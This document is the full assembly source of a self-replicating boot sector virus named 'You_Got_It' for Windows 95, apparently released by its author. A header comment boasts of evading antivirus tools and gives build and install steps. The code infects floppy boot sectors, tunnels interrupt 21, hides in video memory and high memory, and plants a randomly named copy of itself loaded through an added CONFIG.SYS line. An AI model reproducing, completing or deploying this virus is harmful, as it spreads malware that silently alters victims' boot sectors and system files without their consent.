comment * Designed by "Q" the Misanthrope The "You_Got_It" virus needed to be made. Windows 95 has neglected the floppy boot sector virus long enough. Windows 95 in it's 32 bit protected mode has it's own floppy disk routines and doesn't use int 13 or int 40 anymore. When a floppy boot sector viruses infectes the hard disk of the Windows 95 computer, it would flag a change in the MBR or DBR indicating a possible virus attack (not good). The conclusion, don't hook int 13, hook int 21. Problem is, when Windows 95 starts up, it starts in DOS mode then changes to it's protected mode DOS so int 21 hooked in DOS mode isn't hooked anymore. Many of the multipatrite virii will not infect once Windows 95 starts. If your boot sector virus can infect a program called in your AUTOEXEC.BAT or your CONFIG.SYS then the virus would go resident. The "You_Got_it" virus does this. It creates a randomly named file and adds INSTALLH=\AKYTHSQW (name is random) to the CONFIG.SYS file. Now when Windows 95's int 21 is called to change the default drive to A: then the infection occures. Cool features: during boot up the virus moves into video memory then into the High Memory Area (HMA) when dos loads high. The virus tunnels int 21 and loads in the HMA with dos. Also the boot sector infection will not attack the CONFIG.SYS multiple times. P.S. This virus will not be detected by Thunderbytes TBRESCUE Boot sector detector or CMOS virus protection. tasm yougotit /m2 tlink yougotit exe2bin yougotit.exe yougotit.com format a:/q/u debug yougotit.com l 300 0 0 1 w 100 0 0 1 w 300 0 20 1 m 13e,2ff 100 rcx 1c2 w q copy yougotit.com c:\ edit c:\config.sys device=\yougotit.com altf x y * .286 qseg segment byte public 'CODE' assume cs:qseg,es:qseg,ss:nothing,ds:qseg top: jmp short jmp_install ;boot sector data db 90h db 'MSDOS5.0' dw 512 db 1 dw 1 db 2 dw 224 dw 2880 db 0F0h dw 9 dw 18 dw 2 org 003eh com_install proc near jmp short go_mem_res com_install endp jmp_install proc near ;floppy boot up push cs ;for the retf to 0000:7c00 id equ $+01h mov si,7c00h ;7c00 is the infection marker lea bx,word ptr ds:[si] ;bx=7c00 push bx ;for the retf to 0000:7c00 cld push cs mov es,bx ;if monochrome copy code to pop ds ;7c00:7c00 cmp word ptr ds:[0449h],07h ;check if monochrome je monochrome push 0b700h ;lets reside in video memory pop es ;no need for that TOM cmp word ptr es:[si+id-top],si monochrome: push es ;check if already mem resident mov di,si ;di=7c00 mov cx,offset previous_hook ;copy loop varable push cx ;save it because we will copy push si ;the code twice to b700:7c00 rep movsb ;and b700:7dfe pop si pop cx call return_far ;goto b700 segment of code rep movsb ;continue copy to b700:7dfe mov si,1ah*04h ;only hook int 1a je already_res ;if already resident don't movsw ;hook again movsw mov word ptr ds:[si-04h],offset interrupt_1a+7e00h-02h mov word ptr ds:[si-02h],cs ;hook int 1a already_res: push ds ;read moved floppy boot sector pop es mov ax,0201h jmp_install endp set_cx_dx proc near mov bp,word ptr ds:[bx+11h] ;code to point to last sector mov cx,word ptr ds:[bx+16h] ;of the root directory of any shr bp,04h ;floppy disk shl cx,01h add cx,bp inc cx mov dh,01h sub cx,word ptr ds:[bx+18h] int 13h ;read or write boot sector return_far: retf ;return to 7c00:0000 or set_cx_dx endp ;resident_21 routine config_line db "C:\CONFIG.SYS",00 ;file to infect install_name db "INSTALL=" ;what to add file_name db "\" ;random file name goes here db 00h crlf equ $+07h go_mem_res proc near ;CONFIG.SYS residency mov ax,3501h ;get int 1 address for tunnel int 21h mov dx,offset interrupt_1-com_install+100h mov ah,25h ;set int 1 for tunnel push es int 21h pop ds ;ds:dx will be to set it back push 00h ;es=0000h pop es pushf ;simulate interrupt stack lea dx,word ptr ds:[bx] push cs push es ;return to cs:0000 is cd 20 int 01h ;set trap flag db 26h ;es: override in to int table dw 02effh,21h*04h ;jmp far ptr es:[0084] go_mem_res endp interrupt_1 proc near ;set trap flag, trace int 21 pusha ;save varables push sp pop bp ;get pointer push ds push es lds si,dword ptr ss:[bp+10h];get next instruction address cmp word ptr ds:[si+01h],02effh jne go_back ;check if jmp far ?s:[????] cmp word ptr ds:[si-02h],001cdh org $-02h ;see if called from my int 01 int 01h je toggle_tf mov si,word ptr ds:[si+03h] ;get address segment of jmp cmp byte ptr ds:[si+03h],0f0h jb go_back ;see if in HMA area mov bx,((tail-com_install+10h)SHR 4)*10h mov di,0ffffh ;allocate HMA area for virus mov ax,4a02h int 2fh inc di ;is HMA full jz toggle_tf ;if so then just don't bother push si ;move the virus to the HMA cld mov cx,previous_hook-com_install mov si,0100h ;copy virus to HMA rep movs byte ptr es:[di],cs:[si] pop si ;now hook the int 21 chain movsw movsw lea di,word ptr ds:[di-(offset vbuffer-resident_21)] mov word ptr ds:[si-04h],di ;point to resident 21 code mov word ptr ds:[si-02h],es toggle_tf: xor byte ptr ss:[bp+15h],01h;toggle the trap flag go_back: pop es pop ds popa iret interrupt_1 endp interrupt_21 proc near ;hooked in after int 1a sees pushf ;that dos loaded during boot pusha push ds push es push cs pop ds xor ah,4bh ;unload if a program starts jz set_21_back mov ax,3d42h ;open c:\config.sys mov dx,offset config_line+7e00h-02h int 18h ;really it is int 21 mov bx,5700h ;get date xchg ax,bx jc retry_later ;unable to open c:\config.sys int 18h or cl,cl ;is c:\config.sys infected jz close_it pusha ;save file date mov ah,5ah ;create random file mov cx,0005h mov dx,offset file_name+7e00h-02h int 18h mov dx,offset com_install+7c00h mov bh,40h ;write virus code into file xchg ax,bx mov ch,02h int 18h mov ah,3eh ;close it int 18h popa ;date and handle c:\config.sys inc ax ;set date pusha ;save it for later mov ax,4202h ;go to end of c:\config.sys cwd push dx pop cx int 18h mov ah,40h ;write INSTALL=\ line mov word ptr ds:[crlf+7e00h-02h],0a0dh mov cl,low(crlf-install_name+02h) mov dx,offset install_name+7e00h-02h int 18h ;be sure to cr lf terminate it popa ;get file date shr cl,cl ;blitz seconds and more int 18h close_it: mov ah,3eh ;close c:\config.sys int 18h set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h] jmp short set_int_21 ;unhook it 21 retry_later: jmp short jmp_pop_it interrupt_21 endp interrupt_1a proc near ;hooked at boot and waits for pushf ;dos to load pusha mov ax,1200h ;dos loaded push ds push es cwd int 2fh inc al jnz jmp_pop_it ;and unhook int 1a mov ds,dx ;if loaded then hook int 21 mov si,21h*04h ;sorry for all the complexity mov di,offset previous_hook+7c00h les bx,dword ptr cs:[previous_hook+7e00h-02h] mov ds:[si-((21h-1ah)*04h)+02h],es mov ds:[si-((21h-1ah)*04h)],bx les bx,dword ptr ds:[si] mov ds:[si-((21h-18h)*04h)+02h],es push cs ;also save int 21 into int 18 cld mov ds:[si-((21h-18h)*04h)],bx pop es movsw movsw mov dx,offset interrupt_21+7c00h push cs ;set int 21 pop ds set_int_21: mov ax,2521h int 18h jmp_pop_it: jmp short pop_it interrupt_1a endp org 001b4h resident_21 proc near ;memory resident int 21 pushf ;called when loaded from pusha ;config.sys push ds push es cmp ah,0eh ;is it set drive jne pop_it or dl,dl ;drive A: jnz pop_it cwd ;set varables to read sector call next_line next_line: pop bx add bx,offset vbuffer-next_line push cs mov cx,0001h pop es push cs mov ax,0201h ;try reading the boot sector pop ds int 13h jc pop_it ;if not don't infect cmp byte ptr ds:[bx+id-top+01h],7ch je pop_it ;check if infected mov ax,0301h ;move and write boot sector pusha ;save for later push cs ;for far retf call set_cx_dx cld mov cx,previous_hook-com_install lea si,word ptr ds:[bx-offset (vbuffer-com_install)] lea di,word ptr ds:[bx+com_install-top] rep movsb mov word ptr ds:[bx],0000h org $-02h jmp $(jmp_install-top) ;place initial jmp at front popa int 13h ;write it pop_it: pop es pop ds popa popf resident_21 endp org 001fdh far_jmp proc near db 0eah ;jmp to old int 1a or boot previous_hook: label double ;up int 21 or resident int 21 far_jmp endp boot_signature dw 0aa55h ;guess what org $+02h vbuffer label byte ;buffer to read boot sector org $+0202h ;the end of the code tail label byte qseg ends end